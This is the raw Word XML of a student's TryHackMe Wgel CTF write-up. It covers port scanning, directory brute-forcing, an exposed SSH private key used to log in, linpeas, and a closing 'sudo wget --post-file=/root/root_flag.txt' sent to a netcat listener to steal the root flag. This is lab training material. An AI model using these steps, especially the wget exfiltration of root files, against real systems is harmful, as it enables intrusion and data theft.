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708028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  <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="717D10EE" w14:textId="51678DCE" w:rsidR="00525B2F" w:rsidRDefault="00525B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FF6874" wp14:editId="12571CD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E94BAA" w14:textId="4B6BFA34" w:rsidR="00525B2F" w:rsidRDefault="00525B2F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FF68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DE94BAA" w14:textId="4B6BFA34" w:rsidR="00525B2F" w:rsidRDefault="00525B2F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2FADAEC" wp14:editId="5CAD4F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D45A3" w14:textId="77777777" w:rsidR="00525B2F" w:rsidRDefault="00525B2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2FADAEC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163D45A3" w14:textId="77777777" w:rsidR="00525B2F" w:rsidRDefault="00525B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D56AD1" wp14:editId="396FD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36645" w14:textId="76F12B58" w:rsidR="00525B2F" w:rsidRDefault="00823CB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5B2F" w:rsidRPr="00525B2F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SSIGNMENT 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D56AD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27536645" w14:textId="76F12B58" w:rsidR="00525B2F" w:rsidRDefault="00823CB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25B2F" w:rsidRPr="00525B2F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ASSIGNMENT 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0FBD64" wp14:editId="5DE16EE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21D85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68A25C" wp14:editId="452962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28023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AF5370" wp14:editId="6420DE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215A07" w14:textId="6AF5C2C0" w:rsidR="00525B2F" w:rsidRDefault="00525B2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5B2F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STEPS PERFORMED ON WGEL CTF AND LINUX FUNDAMENTAL’S PAR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7AD82" w14:textId="6CCEAFAD" w:rsidR="00525B2F" w:rsidRDefault="00525B2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FAF5370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215A07" w14:textId="6AF5C2C0" w:rsidR="00525B2F" w:rsidRDefault="00525B2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525B2F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STEPS PERFORMED ON WGEL CTF AND LINUX FUNDAMENTAL’S PAR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987AD82" w14:textId="6CCEAFAD" w:rsidR="00525B2F" w:rsidRDefault="00525B2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5E84FF" w14:textId="215B94C8" w:rsidR="00525B2F" w:rsidRDefault="00525B2F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48"/>
              <w:szCs w:val="48"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:color w:val="B80E0F" w:themeColor="accent1"/>
              <w:sz w:val="48"/>
              <w:szCs w:val="48"/>
            </w:rPr>
            <w:br w:type="page"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="0153C208" w14:textId="42E0DBD6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054762C9" w14:textId="77777777" w:rsidR="00BC13CE" w:rsidRPr="00BC13CE" w:rsidRDefault="00BC13CE" w:rsidP="00BC13CE"/>
    <w:p w14:paraId="1EA55D23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59FB330F" w14:textId="77777777" w:rsidTr="00BC0B85">
        <w:trPr>
          <w:trHeight w:val="581"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48F2DBD1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27E7C226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010FE61A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452E935B" w14:textId="77777777" w:rsidTr="00BC0B85">
        <w:trPr>
          <w:trHeight w:val="580"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="14E2A876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66565EC" w14:textId="6E99FB1B" w:rsidR="00E61EB7" w:rsidRPr="00E61EB7" w:rsidRDefault="00752783" w:rsidP="00E61EB7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mmary report </w:t>
            </w:r>
            <w:r w:rsidR="00E61EB7"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 different steps performed on</w:t>
            </w:r>
            <w:r w:rsidR="008C66A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D4BA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gel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00BD4BA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0E1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tf</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="0B03EB46" w14:textId="77777777" w:rsidR="0063015B" w:rsidRPr="00E61EB7" w:rsidRDefault="0063015B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0659C6B" w14:textId="0D6BDE53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</w:t>
            </w:r>
            <w:r w:rsidR="001F38F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133AE4" w14:paraId="3CE76199" w14:textId="77777777" w:rsidTr="00BC0B85">
        <w:trPr>
          <w:trHeight w:val="590"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2830" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="26D7E5C6" w14:textId="77777777" w:rsidR="00133AE4" w:rsidRPr="001F288F" w:rsidRDefault="00A85722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3969CFE" w14:textId="3D5F0BE9" w:rsidR="00A85722" w:rsidRPr="00E61EB7" w:rsidRDefault="00A85722" w:rsidP="00A85722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mmary report on different steps performed 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inux Fundamentals</w:t>
            </w:r>
            <w:r w:rsidR="00020E1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art </w:t>
            </w:r>
            <w:r w:rsidR="00BD4BA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</w:p>
          <w:p w14:paraId="0411A1BB" w14:textId="77777777" w:rsidR="0063015B" w:rsidRPr="0063015B" w:rsidRDefault="0063015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376342A" w14:textId="77777777" w:rsidR="00133AE4" w:rsidRPr="001F288F" w:rsidRDefault="00133AE4" w:rsidP="007527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8BBEFB2" w14:textId="59AFC089" w:rsidR="00133AE4" w:rsidRPr="001F288F" w:rsidRDefault="001F38F0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020E1C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</w:tbl>
    <w:p w14:paraId="1397ED92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4681BC5A" w14:textId="01A95EF9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0C4EF6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">STEPS PERFORMED ON </w:t>
      </w:r>
      <w:r w:rsidR="00CD2246">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">WGEL </w:t>
      </w:r>
      <w:r w:rsidR="00C4529B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">CTF </w:t>
      </w:r>
      <w:r w:rsidR="00A85722">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">AND LINUX </w:t>
      </w:r>
      <w:r w:rsidR="00C4529B">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">FUNDAMENTAL’S PART </w:t>
      </w:r>
      <w:r w:rsidR="00CD2246">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="00A85722" w:rsidRPr="00744BC2">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="000C4EF6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="B80E0F" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>TRYHACK ME)</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="28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szCs w:val="21"/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="7A239904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  <w:lang w:val="en-IN"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="42B223DE" w14:textId="2AF94061" w:rsidR="00EE3915" w:rsidRPr="00752783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EE1F40">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:color w:val="B80E0F" w:themeColor="accent1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>5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EE1F40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0C4EF6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EE1F40">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:color w:val="B80E0F" w:themeColor="accent1"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>5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4716C767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4FEC8665" w14:textId="77777777" w:rsidR="00747F89" w:rsidRPr="00D47E8B" w:rsidRDefault="00747F8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3FECB193" w14:textId="09305E28" w:rsidR="00BC56F5" w:rsidRDefault="00E165DC" w:rsidP="000C4EF6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 w:rsidR="000C4EF6">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t xml:space="preserve">steps performed on </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidR="00CD2246">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>Wgel</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="00CD2246"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="00C4529B">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:szCs w:val="28"/>
            </w:rPr>
            <w:t>CTF</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="766528EB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21DFBB61" w14:textId="77777777" w:rsidR="00861D1E" w:rsidRPr="008C66A5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1: </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1F244365" w14:textId="51E7D098" w:rsidR="00861D1E" w:rsidRDefault="001627DC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Startup </w:t>
          </w:r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 xml:space="preserve">room was solved today on </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>tryhackme</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> At first, the machine was started and we copied the IP Address which was provided by </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>Tryhackme</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> for port scanning</w:t>
          </w:r>
          <w:r w:rsidR="00950C3E">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> then we opened the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attack box</w:t>
          </w:r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CD2246">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> Then we downloaded the configuration file.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="453A26F1" w14:textId="64CC4D69" w:rsidR="00CD2246" w:rsidRDefault="00CD2246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0CC29D86" wp14:editId="4C719B1A">
                <wp:extent cx="5729248" cy="1443990"/>
                <wp:effectExtent l="0" t="0" r="508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11" b="39208"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5731510" cy="144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3A3449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CF4B002" w14:textId="77777777" w:rsidR="00861D1E" w:rsidRPr="008C66A5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</w:p>
        <w:p w14:paraId="62110E3F" w14:textId="6FA1D01C" w:rsidR="00861D1E" w:rsidRDefault="0049217F" w:rsidP="0049217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Initially</w:t>
          </w:r>
          <w:r w:rsidR="00950C3E">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> we created a folder name </w:t>
          </w:r>
          <w:r w:rsidR="00CD2246">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve">CTF </w:t>
          </w:r>
          <w:r w:rsidR="00950C3E" w:rsidRPr="00950C3E">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>in the desktop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, and inside that folder we created 2 more folder as Web and Nmap.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on the terminal in order to port scan we used the comman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nma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C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v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A -</w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/>
          <w:r w:rsidR="00CD2246">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>Pn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10.10.</w:t>
          </w:r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>150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>46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 xml:space="preserve"> And we obtained the following results.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="435C78B4" w14:textId="08E78866" w:rsidR="00C4529B" w:rsidRDefault="00CD2246" w:rsidP="0049217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21B143E1" wp14:editId="54300B8F">
                <wp:extent cx="5132370" cy="1160289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420" r="57887" b="44133"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5152671" cy="1164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F10691" w14:textId="77777777" w:rsidR="00CD2246" w:rsidRDefault="00CD2246" w:rsidP="00CD224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ith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udo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nano /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etc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/hosts command we save the IP address as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wgel.thm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11902DEE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33EB01E" w14:textId="39958B38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3:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="4E4D6D4A" w14:textId="195750CD" w:rsidR="00CD2246" w:rsidRDefault="00CD2246" w:rsidP="00CD224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e performe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gobuster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scan with the comman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dir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u</w:t>
          </w:r>
          <w:r w:rsidRPr="008800A0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hyperlink r:id="rId9" w:history="1">
            <w:r w:rsidR="008800A0" w:rsidRPr="008800A0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>http://</w:t>
            </w:r>
            <w:r w:rsidR="008800A0" w:rsidRPr="008800A0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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>wgel.thm/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="008800A0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="20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-w /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usr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>/share/wordlists/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dirbuster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>/directory-list-2.3-medium.txt -t 30</w:t>
          </w:r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 xml:space="preserve"> -o web/gobuster.txt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in order to find more about directories. </w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="390AB312" w14:textId="4D013DC6" w:rsidR="00CD2246" w:rsidRDefault="008800A0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800A0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:noProof/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:lastRenderedPageBreak/>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F181F0D" wp14:editId="66C920EE">
                <wp:extent cx="5332719" cy="1544320"/>
                <wp:effectExtent l="0" t="0" r="190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20" r="6942" b="28970"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5333610" cy="1544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ABC3AC" w14:textId="77777777" w:rsidR="008800A0" w:rsidRDefault="008800A0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F3875D5" w14:textId="77777777" w:rsidR="0019470D" w:rsidRPr="008C66A5" w:rsidRDefault="0026644D" w:rsidP="0026644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</w:p>
        <w:p w14:paraId="540D2792" w14:textId="42AE0E2B" w:rsidR="00E112CB" w:rsidRDefault="0026644D" w:rsidP="0026644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In </w:t>
          </w:r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the </w:t>
          </w:r>
          <w:r w:rsidR="00744BC2">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>previous</w:t>
          </w:r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>gobuster</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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scan we found that </w:t>
          </w:r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 xml:space="preserve">sitemap is present so we visited the site and performed another </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>gobuster</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="008800A0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> scan with sitemap with the following command </w:t>
          </w:r>
          <w:proofErr w:type="spellStart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dir</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd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 xml:space="preserve"> -u</w:t>
          </w:r>
          <w:r w:rsidR="00A3311E" w:rsidRPr="008800A0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hyperlink r:id="rId11" w:history="1">
            <w:r w:rsidR="00A3311E" w:rsidRPr="00A3311E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>http://</w:t>
            </w:r>
            <w:r w:rsidR="00A3311E" w:rsidRPr="00A3311E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0"/>
                <w:u w:val="none"/>
              </w:rPr>
              <w:t>wgel.thm/sitemap/</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidR="00A3311E">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="20"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r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-w /</w:t>
          </w:r>
          <w:proofErr w:type="spellStart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usr</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd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/share/wordlists/</w:t>
          </w:r>
          <w:proofErr w:type="spellStart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dirbuster</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="00A3311E">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>/directory-list-2.3-medium.txt -t 30 -o web/gobuster.txt</w:t>
          </w:r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. And we got the following result.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="17B3F8EA" w14:textId="52AC9CCD" w:rsidR="00AA07F4" w:rsidRDefault="00A3311E" w:rsidP="00AA07F4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430843B5" wp14:editId="25BA06BA">
                <wp:extent cx="5331432" cy="1667436"/>
                <wp:effectExtent l="0" t="0" r="3175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3" t="11440" r="4543" b="36825"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5332807" cy="1667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60D98F" w14:textId="77777777" w:rsidR="00881127" w:rsidRDefault="00881127" w:rsidP="00DA1E46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48737C4" w14:textId="77777777" w:rsidR="008A599E" w:rsidRDefault="008A599E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5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174B2502" w14:textId="7BEA87D4" w:rsidR="004E70E8" w:rsidRPr="001627DC" w:rsidRDefault="001627DC" w:rsidP="004E70E8">
          <w:pPr>
            <w:pStyle w:val="Content"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1779"/>
            </w:tabs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The</w:t>
          </w:r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n we again did another scan using the command ‘</w:t>
          </w:r>
          <w:proofErr w:type="spellStart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dirb</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd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 xml:space="preserve">’, </w:t>
          </w:r>
          <w:proofErr w:type="spellStart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dirb</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd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hyperlink r:id="rId13" w:history="1">
            <w:r w:rsidR="004E70E8" w:rsidRPr="004E70E8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>http://wgel.thm/sitemap/</w:t>
            </w:r>
          </w:hyperlink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 xml:space="preserve"> -w /</w:t>
          </w:r>
          <w:proofErr w:type="spellStart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usr</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd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/share/wordlists/</w:t>
          </w:r>
          <w:proofErr w:type="spellStart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dirb</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd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>/common.txt. Then we got. shh extension.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="33E911FC" w14:textId="4F746199" w:rsidR="00473AEB" w:rsidRDefault="004E70E8" w:rsidP="00DA1E4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3ED0F79C" wp14:editId="08F8C9D3">
                <wp:extent cx="3857044" cy="1990164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2" t="12394" r="42473" b="37295"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3863471" cy="199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63CE6F" w14:textId="77777777" w:rsidR="00473AEB" w:rsidRDefault="00473AEB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FF23D8E" w14:textId="77777777" w:rsidR="004E70E8" w:rsidRDefault="004E70E8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3B2EB28" w14:textId="77777777" w:rsidR="004E70E8" w:rsidRDefault="004E70E8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C00C29B" w14:textId="77777777" w:rsidR="004E70E8" w:rsidRDefault="004E70E8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2F342A8" w14:textId="51F4161A" w:rsidR="008A599E" w:rsidRPr="008C66A5" w:rsidRDefault="008A599E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lastRenderedPageBreak/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6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7408CEF8" w14:textId="32157297" w:rsidR="00544C7D" w:rsidRDefault="0004304B" w:rsidP="00544C7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</w:t>
          </w:r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 xml:space="preserve">we performed the scan </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>with.shh</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="004E70E8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 xml:space="preserve">extension we got a private </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>key.Then</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> with nano command as nano </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>id_rsa</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/>
          <w:r w:rsidR="00544C7D">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> we saved the message.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="7BD9C7B2" w14:textId="581C7305" w:rsidR="00544C7D" w:rsidRDefault="00544C7D" w:rsidP="00544C7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5675648D" wp14:editId="783C1E1D">
                <wp:extent cx="3495462" cy="2574151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9" t="7390" r="42197" b="19915"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3511881" cy="258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F42C0B0" w14:textId="77777777" w:rsidR="00C07555" w:rsidRDefault="00C07555" w:rsidP="009F61C3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EE713A1" w14:textId="77777777" w:rsidR="00C07555" w:rsidRDefault="00C07555" w:rsidP="00C0755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7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65CB661B" w14:textId="4B15BD81" w:rsidR="00544C7D" w:rsidRDefault="00544C7D" w:rsidP="004F5D5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from the html page of sitemap we got the user name as jessie and then with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sh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command we entered into the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file.With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ls command we can see the directories present here.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="54CCE7EB" w14:textId="04B5BD37" w:rsidR="00BB46BA" w:rsidRDefault="004F5D52" w:rsidP="00C771D9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705325A7" wp14:editId="4BE92AA4">
                <wp:extent cx="5755341" cy="307361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" t="5786" r="32869" b="88124"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5927381" cy="316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84F5C1" w14:textId="77777777" w:rsidR="007F34DA" w:rsidRDefault="007F34DA" w:rsidP="00BB46B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112E81C" w14:textId="5A30C867" w:rsidR="00BB46BA" w:rsidRPr="00BD4BA6" w:rsidRDefault="00BB46BA" w:rsidP="00BB46B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BD4BA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8:</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="40CD394B" w14:textId="314042D5" w:rsidR="00BB46BA" w:rsidRDefault="00BB46BA" w:rsidP="00BB46B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e downloaded the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linpeas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from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github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link and saved it in the script directory. Then </w:t>
          </w:r>
          <w:r w:rsidR="00BD4BA6">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>opened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it in the terminal.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="28B0AA71" w14:textId="7A9D6EEF" w:rsidR="000D34CC" w:rsidRDefault="00BD4BA6" w:rsidP="00C771D9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41B676EF" wp14:editId="3B27A2CD">
                <wp:extent cx="5624713" cy="184155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1" r="23071" b="35647"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5690751" cy="1863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AECCB1" w14:textId="77777777" w:rsidR="00C771D9" w:rsidRDefault="00C771D9" w:rsidP="0072714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C878978" w14:textId="6DBB843F" w:rsidR="0072714C" w:rsidRDefault="0072714C" w:rsidP="0072714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9F61C3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C771D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9</w:t>
          </w:r>
          <w:r w:rsidRPr="009F61C3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4DCD55CE" w14:textId="0ECA651C" w:rsidR="007F34DA" w:rsidRPr="007F34DA" w:rsidRDefault="007F34DA" w:rsidP="007F34D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 xml:space="preserve">In order to make the post request of the file into the file we use the following command </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>sudo</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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>wget</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> –post-file=/root/root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_flag</w:t>
          </w:r>
          <w:r w:rsidRPr="000F2EAC">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve">.txt </w:t>
          </w:r>
          <w:hyperlink r:id="rId18" w:history="1">
            <w:r w:rsidRPr="007F34DA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>http://10.10.150.46:1234</w:t>
            </w:r>
          </w:hyperlink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16B180F6" w14:textId="1EFEEAD9" w:rsidR="0004304B" w:rsidRDefault="007F34DA" w:rsidP="0004304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 xml:space="preserve">to connect with the user, we used </w:t>
          </w:r>
          <w:proofErr w:type="spellStart"/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>nc</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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>nlvp</w:t>
          </w:r>
          <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> 1234 command and made a connection.</w:t>
          </w:r>
          <w:r w:rsidR="0063602B">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> And here got the root flag.</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1EC2B3E1" w14:textId="0595AD94" w:rsidR="0063602B" w:rsidRPr="000D34CC" w:rsidRDefault="000D34CC" w:rsidP="007F34D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lastRenderedPageBreak/>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidR="00C771D9">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="485C0DCF" wp14:editId="36E1D499">
                <wp:extent cx="3165822" cy="1231340"/>
                <wp:effectExtent l="0" t="0" r="0" b="6985"/>
                <wp:docPr id="7" name="Picture 7" descr="C:\Users\Rojalin parida\Downloads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:\Users\Rojalin parida\Downloads\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</a:blip>
                        <a:srcRect l="1208" t="7303" r="3097"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3194223" cy="124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971E34" w14:textId="20101C92" w:rsidR="00BA370F" w:rsidRDefault="00BA370F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</w:t>
          </w:r>
          <w:r w:rsidR="0063602B" w:rsidRPr="0063602B"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07BDD539" wp14:editId="2888A913">
                <wp:extent cx="4241763" cy="1490702"/>
                <wp:effectExtent l="0" t="0" r="698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 rotWithShape="1">
                        <a:blip r:embed="rId2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2" t="22166" r="57618" b="53030"/>
                        <a:stretch/>
                      </pic:blipFill>
                      <pic:spPr bwMode="auto">
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4241763" cy="1490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24DDD0" w14:textId="125E4710" w:rsidR="0063602B" w:rsidRDefault="0063602B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5D8E3C4" w14:textId="4DA26C1E" w:rsidR="0063602B" w:rsidRDefault="0063602B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C771D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10</w:t>
